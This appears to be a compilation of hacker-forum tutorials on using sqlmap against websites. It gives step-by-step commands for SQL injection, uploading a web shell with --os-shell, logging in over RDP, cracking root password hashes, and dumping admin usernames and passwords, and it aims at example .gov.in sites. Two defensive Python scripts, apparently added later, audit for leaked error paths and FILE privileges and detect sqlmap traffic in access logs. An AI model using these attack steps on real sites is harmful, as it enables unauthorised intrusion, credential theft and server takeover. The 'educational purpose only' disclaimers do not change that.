How To Upload a Shell Using SQLMAP, Then Get RDP

Hey, Salam guys.
Today I'll tell you about
shell uploading through sqlmap.

It's very easy if you have a few things 😉

-1st-
A vulnerable website with its full path
-2nd-
File write privileges
-3rd-
sqlmap
-4th-
Me 😀

Start it.

Open your sqlmap.
I have sqlmap with its GUI,
so the work becomes very easy 😀
You can also use the sqlmap shell without its GUI; just type this:
./sqlmap.py -u http://www.site.in/index.php?id=1 --os-shell

link to use sqlmap with GUI
First, tick the URL box.
Now paste the vulnerable link into the target box,
then click on Get Query and you'll see the website appear in the
"Query To Sqlmap" box,
like in the picture.
Now open the "Access" tab in sqlmap,
then => Operating System,
then => sqlshell,
and tick sqlshell.
Then click on Get Query again.
Then click on the Start button.
A window will pop up after 1-2 minutes.
It will ask you to enter the web application language,
like in this pic.
The web server is MySQL, so I'll choose 4, PHP (Default).
It will start working again
and then ask you to give the web root path.
"Web Root Path"
is the text you got from an error, like
mysql_error /home/india/public_html
This is called the web root path.

In my case, the error is
mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\xampp\htdocs\DavWeb\src\controllers\photocontroller.php
so my root path =>
C:\xampp\htdocs\DavWeb\
Sometimes sqlmap gets the root path automatically, like in this pic.

please provide any additional web server full path to try to upload the agent 
[Enter for None]:
Just press Enter.


Woha! Shell uploaded =))

It will automatically connect the shell with sqlmap/cmd.

========================================
You can also get RDP from the shell 😛

Just type in Run =>
mstsc.exe and enter the website's IP,
then enter your password and enjoy 😀

Thanks for reading.

Note: For Educational Purpose Only
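
The first two prerequisites above are server-side conditions a defender can audit directly: error output that discloses filesystem paths, and a database account with file-write ability. The following is an added example, not part of the original post; it assumes MySQL, and the function names, the `webapp` and `report` accounts and the sample grants are constructed for illustration.

```python
import re

# PHP error text ending in "... in <absolute path>.php" (Windows or Unix path).
PATH_LEAK = re.compile(
    r"(?:warning|notice|fatal error|expects parameter)[^\n]*?\bin\s+"
    r"((?:[A-Za-z]:\\|/)[^\s<>\"']+\.php)", re.IGNORECASE)
# One line of SHOW GRANTS output for a global (*.*) grant.
GLOBAL_GRANT = re.compile(r"GRANT\s+(.+?)\s+ON\s+\*\.\*\s+TO\s+(\S+)", re.IGNORECASE)

def leaked_paths(response_body):
    """Absolute script paths exposed by PHP error messages in a response body."""
    return PATH_LEAK.findall(response_body)

def accounts_with_file_priv(show_grants_lines):
    """Accounts whose global grants include FILE (ALL PRIVILEGES implies it)."""
    risky = []
    for line in show_grants_lines:
        m = GLOBAL_GRANT.match(line.strip())
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group(1).split(",")}
        if privs & {"FILE", "ALL PRIVILEGES", "ALL"}:
            risky.append(m.group(2).replace("`", "'"))
    return risky

def secure_file_priv_state(value):
    """Interpret the MySQL secure_file_priv system variable."""
    if value is None or value.upper() == "NULL":
        return "disabled"        # server refuses file import/export entirely
    if value == "":
        return "unrestricted"    # server may read/write any path the OS allows
    return "restricted"          # limited to the one configured directory

def audit(response_body, show_grants_lines, secure_file_priv):
    findings = [f"path disclosed in error output: {p}" for p in leaked_paths(response_body)]
    state = secure_file_priv_state(secure_file_priv)
    if state != "disabled":
        findings += [f"{a} holds FILE, secure_file_priv is {state}"
                     for a in accounts_with_file_priv(show_grants_lines)]
    return findings

# Constructed sample input: the error text quoted above plus made-up grants.
SAMPLE_BODY = ("<b>Warning</b>: mysql_fetch_array() expects parameter 1 to be resource, "
               r"boolean given in C:\xampp\htdocs\DavWeb\src\controllers\photocontroller.php")
SAMPLE_GRANTS = ["GRANT SELECT, INSERT, FILE ON *.* TO 'webapp'@'localhost'",
                 "GRANT SELECT, INSERT ON `shop`.* TO 'report'@'localhost'"]

if __name__ == "__main__":
    print("\n".join(audit(SAMPLE_BODY, SAMPLE_GRANTS, "")))
```

Run it against rendered pages from your own application and real `SHOW GRANTS` output; turning off on-page error display and revoking FILE from the web application's account removes both findings.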

How To Get Root With SQLMAP?


Salam all 🙂

Today I'm going to show you
how to get the current user with sqlmap,
plus shell uploading with sqlmap =))

You need:
1) Backtrack 5R2
2) sqlmap
3) A SQL-vulnerable website

Start your Backtrack 5R2.

Open sqlmap.

Type:
python sqlmap.py -u http://www.vulnsite.in/index.php?id=1 -v 1 --current-user --password

Let it work 😉

After 1 or 2 minutes

it will show:
Do you want to use dictionary attack on retrieved password hashes?
Type:
y
It will start the dictionary attack.
Press Enter, Enter 😉

Now you have the root password =)) =))


Note: It only works on a few websites. Try your luck 😉
Note: For Educational Purpose ONLY!!

How To Run SQLMAP In Windows ?

./Sa|aM*


========================
Today I'll tell you
how to use sqlmap in Windows.
Note: Educational Purpose Only!
========================
====================
1st) Download Python 2.7 and
install it. It will take just 5 minutes.
=====================

======================
2nd) Then download sqlmap
(download the zip file).
======================

Then unzip it with 7zip or WinRAR.

=============================
Go to Start Menu => Run => type cmd
and change directory to where you unzipped sqlmap.
Mine is
D:/sqlmap/sqlmap.py
so you type in cmd
C:\Documents and Settings\killed>cd /d D:\sqlmap
then
D:\sqlmap>python sqlmap.py

Type in cmd:

python sqlmap.py -u http://www.site.gov.in/index.php?id=1

It will start working 🙂

Comment for help

SQL Injection Using SQLMAP


Salam,
Today I'll teach you how to do "SQL injection" with sqlmap!

What is sqlmap?
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features

  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry.
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass.
  • Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
  • Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.
Let's get back to injecting.
First of all, download sqlmap from its official website
and download Python 2.7.
Now open cmd:
Start => Run => cmd
Now change directory (cd) to where you have unzipped sqlmap:
cmd:>cd /d D:\sqlmap
- Injecting Part -
python sqlmap.py -u http://www.site.gov.in/index.php?id=1 --dbs
What is -u? It means URL.
What is --dbs? It means "databases"; this command will find the database(s).
It will start working.
After the databases are found,
run this:
python sqlmap.py -u http://www.site.gov.in/index.php?id=1 -D database_name --tables
-D means database name. For example, with these databases found:
site_database
information_schema
if you want to get the tables of site_database,
you'll give this command:
python sqlmap.py -u http://www.site.gov.in/index.php?id=1 -D site_database --tables
Once the tables are found:
python sqlmap.py -u http://www.site.gov.in/index.php?id=1 -D site_database -T "table_name_here" --columns
It will give you the columns.
For an admin table, the columns will be something like: username, password, uid, email, etc.
How to get the password from the columns?
python sqlmap.py -u http://www.site.gov.in/index.php?id=1 -D site_database -T admin --dump
It will dump the usernames and passwords from the admin table.
If there is a hash, you can also brute-force it via sqlmap 😉
Comment for any queries 🙂

For Educational Purpose Only
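
From the defender's side, the runs described in these posts leave traces in web server access logs. The following added example (not part of the original post) flags client IPs by sqlmap's default User-Agent string and by SQL keywords in the decoded query string; the log lines, IPs, version string and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Combined log format: ip - - [time] "METHOD uri PROTO" status size "referer" "ua"
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" '
                  r'(\d{3}) \S+ "[^"]*" "([^"]*)"')

# SQL keywords that have no business appearing in a numeric id= parameter.
SQLI_TOKENS = re.compile(
    r"union\s+(all\s+)?select|information_schema|into\s+(out|dump)file|"
    r"sleep\s*\(|benchmark\s*\(|order\s+by\s+\d+\s*(--|#)", re.IGNORECASE)

def detect(lines):
    """Map client IP -> sorted list of reasons it was flagged."""
    hits = defaultdict(set)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, _method, uri, _status, ua = m.groups()
        if "sqlmap" in ua.lower():
            hits[ip].add("sqlmap-user-agent")
        query = unquote_plus(uri.partition("?")[2])  # decode %20, + and friends
        if SQLI_TOKENS.search(query):
            hits[ip].add("sqli-token-in-query")
    return {ip: sorted(reasons) for ip, reasons in hits.items()}

# Constructed sample log (documentation IP ranges, made-up requests).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?id=1 HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?id=1%20AND%201%3D1 HTTP/1.1" '
    '200 5120 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '198.51.100.7 - - [01/Jan/2024:10:00:06 +0000] "GET /index.php?id=1%20UNION%20ALL%20SELECT%20NULL--%20- HTTP/1.1" '
    '200 5120 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '203.0.113.9 - - [01/Jan/2024:10:02:00 +0000] "GET /index.php?id=1%20ORDER%20BY%205--%20- HTTP/1.1" '
    '500 312 "-" "Mozilla/5.0 (Windows NT 10.0)"',
]

if __name__ == "__main__":
    for ip, reasons in detect(SAMPLE_LOG).items():
        print(ip, reasons)
```

The User-Agent header is client-controlled, so treat the query-string check as the more durable of the two signals and the header match as a quick triage aid.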